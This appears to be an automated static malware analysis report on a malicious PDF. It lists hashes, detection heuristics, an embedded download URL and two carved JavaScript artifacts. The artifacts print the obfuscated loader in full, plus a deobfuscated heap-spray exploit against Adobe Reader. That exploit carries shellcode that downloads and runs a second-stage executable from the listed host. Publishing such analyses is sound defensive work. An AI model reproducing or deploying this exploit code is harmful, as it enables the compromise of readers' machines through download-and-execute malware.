Malicious PDF — malware analysis report

Static analysis result for SHA-256 eab858df2ff4bc5a…

MALICIOUS

PDF

3.6 KB First seen: 2026-05-08
MD5: 43bdb9060606d49da8cefcd2ce08cf3e SHA-1: 0f21f4b3fe9a47254be90d38184b77082c873aa4 SHA-256: eab858df2ff4bc5add7b2620bf13a3407906a7f437ecde0504899b82cf8c5c9a
158 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by multiple heuristic firings related to PDF JavaScript actions and embedded JS streams. The deobfuscated JavaScript, named 'legacy_pdfkit_stage_000.js', likely attempts to download and execute a second-stage payload. The obfuscation and the nature of the embedded script suggest a downloader or droppper functionality, common in initial access stages of malware delivery. Due to the obfuscation, the exact payload and delivery mechanism cannot be fully determined.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 6

  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
            for (var i=0; i < list.length; i++) {
            result +=  String.fromCharCode(list[i] - jump);
        }
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://splo.in/x/p.php?e=8&& Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0005_000.js pdf-javascript-stream PDF /JS object 5 at offset 0x107 8761 bytes
SHA-256: 7c4d082f497cb065886e7209de23ab89fa7f381a4479f1d7c00e1c74539178a9
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
sourceCode = "10,118,97,114,32,112,112,112,32,61,32,34,34,43,34,37,34,59,10,118,97,114,32,112,112,112,50,32,61,32,34,34,43,34,97,34,59,10,102,117,110,99,116,105,111,110,32,115,100,100,115,119,119,119,51,51,50,51,50,51,50,101,119,40,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,41,10,123,10,105,102,40,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,32,61,61,49,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,41,32,114,101,116,117,114,110,32,40,32,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,32,32,34,34,43,32,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,32,32,32,32,97,112,112,91,34,118,34,43,34,105,101,34,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,43,34,34,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,43,34,119,101,114,84,121,34,43,97,112,112,46,100,111,99,91,34,85,34,43,34,34,43,34,82,76,34,93,91,51,93,43,34,101,34,93,91,49,93,32,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,32,32,41,59,10,105,102,40,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,32,61,61,50,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,41,32,114,101,116,117,114,110,32,40,32,32,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,32,34,34,43,32,32,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,32,32,112,112,112,32,32,32,32,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,32,32,41,59,10,105,102,40,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,32,61,61,51,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,41,32,114,101,116,117,114,110,32,40,32,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,32,32,34,34,43,32,32,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,32,32,32,32,32,32,112,112,112,50,32,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,41,59,10,125,10,10,118,97,114,32,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,66,105,111,72,72,75,75,69,119,87,55,55,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,32,61,32,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,116,104,105,115,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,59,32,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,10,10,118,97,114,32,99,83,86,122,112,71,72,99,83,103,56,57,32,61,91,34,34,44,115,100,100,115,119,119,119,51,51,50,51,50,51,50,101,119,40,49,41,44,115,100,100,115,119,119,119,51,51,50,51,50,51,50,101,119,40,50,41,44,115,100,100,115,119,119,119,51,51,50,51,50,51,50,101,119,40,51,41,44,34,34,44,34,34,44,34,111,34,44,34,115,34,44,34,99,34,44,34,105,34,44,34,103,34,44,34,116,34,44,34,114,34,44,34,117,34,44,34,110,34,44,34,112,34,93,59,10,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,10,10,118,97,114,32,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,66,105,111,72,72,75,75,69,119,87,55,55,122,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,32,61,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,32,97,112,112,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,59,32,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,10,118,97,114,32,109,106,83,85,118,68,86,78,68,85,49,32,61,32,99,83,86,122,112,71,72,99,83,103,56,57,91,49,93,59,10,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,10,118,97,114,32,89,120,90,114,86,72,116,74,89,102,51,32,61,32,99,83,86,122,112,71,72,99,83,103,56,57,91,50,93,59,10,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,10,118,97,114,32,115,66,85,117,105,118,119,76,66,119,49,55,32,61,32,66,105,111,72,72,75,75,69,119,87,55,55,91,109,106,83,85,118,68,86,78,68,85,49,43,34,118,34,43,99,83,86,122,112,71,72,99,83,103,56,57,91,51,93,43,34,108,34,93,59,10,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,10,118,97,114,32,114,118,120,69,77,101,116,109,118,117,49,56,32,61,32,66,105,111,72,72,75,75,69,119,87,55,55,91,99,83,86,122,112,71,72,99,83,103,56,57,91,49,51,93,43,99,83,86,122,112,71,72,99,83,103,56,57,91,49,52,93,43,109,106,83,85,118,68,86,78,68,85,49,43,34,115,34,43,99,83,86,122,112,71,72,99,83,103,56,57,91,56,93,43,99,83,86,122,112,71,72,99,83,103,56,57,91,51,93,43,99,83,86,122,112,71,72,99,83,103,56,57,91,49,53,93,43,109,106,83,85,118,68,86,78,68,85,49,93,59,10,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,10,10,115,66,85,117,105,118,119,76,66,119,49,55,40,34,118,34,43,99,83,86,122,112,71,72,99,83,103,56,57,91,51,93,43,34,114,32,116,65,77,82,104,111,90,82,66,97,49,53,32,61,32,47,104,105,32,97,118,32,104,97,120,34,43,99,83,86,122,112,71,72,99,83,103,56,57,91,56,93,43,34,47,34,43,99,83,86,122,112,71,72,99,83,103,56,57,91,57,93,43,99,83,86,122,112,71,72,99,83,103,56,57,91,49,48,93,43,34,59,34,41,59,10,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,10,118,97,114,32,89,78,85,81,88,81,108,114,90,72,49,48,32,61,32,66,105,111,72,72,75,75,69,119,87,55,55,122,91,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,32,32,32,32,32,34,100,34,43,99,83,86,122,112,71,72,99,83,103,56,57,91,55,45,49,93,43,99,83,86,122,112,71,72,99,83,103,56,57,91,55,43,49,93,93,59,10,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,10,89,78,85,81,88,81,108,114,90,72,49,48,91,99,83,86,122,112,71,72,99,83,103,56,57,91,55,93,43,34,121,110,34,43,99,83,86,122,112,71,72,99,83,103,56,57,91,56,93,43,34,65,34,43,99,83,86,122,112,71,72,99,83,103,56,57,91,49,52,93,43,99,83,86,122,112,71,72,99,83,103,56,57,91,49,52,93,43,34,111,34,43,99,83,86,122,112,71,72,99,83,103,56,57,91,49,49,93,43,34,83,34,43,99,83,86,122,112,71,72,99,83,103,56,57,91,56,93,43,99,83,86,122,112,71,72,99,83,103,56,57,91,51,93,43,34,110,34,93,40,41,59,10,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,10,118,97,114,32,113,75,79,73,101,75,77,65,89,80,52,32,61,32,89,78,85,81,88,81,108,114,90,72,49,48,91,99,83,86,122,112,71,72,99,83,103,56,57,91,49,48,93,43,109,106,83,85,118,68,86,78,68,85,49,43,34,116,65,110,110,34,43,99,83,86,122,112,71,72,99,83,103,56,57,91,54,93,43,99,83,86,122,112,71,72,99,83,103,56,57,91,49,49,93,43,99,83,86,122,112,71,72,99,83,103,56,57,91,55,93,93,40,48,41,59,10,32,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,10,118,97,114,32,85,107,102,71,110,115,75,115,71,86,53,32,61,32,113,75,79,73,101,75,77,65,89,80,52,91,48,93,91,99,83,86,122,112,71,72,99,83,103,56,57,91,55,93,43,34,117,98,106,34,43,109,106,83,85,118,68,86,78,68,85,49,43,99,83,86,122,112,71,72,99,83,103,56,57,91,56,93,43,99,83,86,122,112,71,72,99,83,103,56,57,91,49,49,93,93,59,10,32,32,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,10,118,97,114,32,97,101,83,65,87,111,72,80,120,103,54,32,61,32,85,107,102,71,110,115,75,115,71,86,53,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,91,99,83,86,122,112,71,72,99,83,103,56,57,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,91,49,49,43,49,93,43,109,106,83,85,118,68,86,78,68,85,49,43,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,99,83,86,122,112,71,72,99,83,103,56,57,91,49,53,93,43,34,108,34,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,43,99,83,86,122,112,71,72,99,83,103,56,57,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,91,51,93,43,99,83,86,122,112,71,72,99,83,103,56,57,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,91,56,93,43,109,106,83,85,118,68,86,78,68,85,49,93,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,40,116,65,77,82,104,111,90,82,66,97,49,53,44,89,120,90,114,86,72,116,74,89,102,51,41,59,10,47,42,105,105,105,57,100,57,57,57,57,57,57,57,57,105,105,105,42,47,10,118,97,114,32,117,110,114,74,119,86,85,73,86,115,55,61,114,118,120,69,77,101,116,109,118,117,49,56,40,114,118,120,69,77,101,116,109,118,117,49,56,40,97,101,83,65,87,111,72,80,120,103,54,41,41,59,10,115,66,85,117,105,118,119,76,66,119,49,55,40,117,110,114,74,119,86,85,73,86,115,55,41,59,10,10,105,102,40,106,41,123,10,102,117,110,99,116,105,111,110,32,114,117,110,40,41,123,117,116,105,108,91,118,118,118,50,93,40,118,118,118,44,32,110,101,119,32,68,97,116,101,40,41,41,59,125,10,114,117,110,40,41,59,114,117,110,40,41,59,10,116,114,121,32,123,116,104,105,115,91,118,118,118,52,93,91,118,118,118,51,93,40,110,117,108,108,41,59,125,32,99,97,116,99,104,40,101,41,32,123,125,10,114,117,110,40,41,59,10,125"; 
function decrypt(str, jump){
var result = "";
var list = str.split(',');
        for (var i=0; i < list.length; i++) {
            result +=  String.fromCharCode(list[i] - jump);
        }
        return result;
        }
legacy_pdfkit_stage_000.js deobfuscated-js repeated-marker hex decoded JavaScript at offset 0x6FE 1220 bytes
SHA-256: d7155f873b59e589a73c704be477a30cf4921d43cb2c81abc4b0960cad6f3280
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var aPlugins = app.plugIns;
for (var i=0; i < aPlugins.length; i++){
if (aPlugins[i].name=="EScript"){var lv=aPlugins[i].version;}}
if ((lv>9)&&(lv<9.3)){var j=1400;} else if((lv>8.12)&&(lv<8.2)){var j=2900;}else{}
s=new Array();
var sh = "%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u7468%u7074%u2F3A%u732F%u6C70%u2E6F%u6E69%u782F%u702F%u702E%u7068%u653F%u383D%u2626";
var str="%u9090%u9090";
sh=unescape(sh);str=unescape(str);
while(str.length <= 0x8000) {str+=str;}
str=str.substr(0,0x8000 - sh.length);
for(i=0;i<j;i++) {s[i]=str + sh;}
var vvv = "p@111111111111111111111111 : yyyy111";
var vvv2 = "printd";
var vvv3 = "newPlayer";
var vvv4 = "media";

Open this report in the interactive analyzer, or submit your own file for analysis.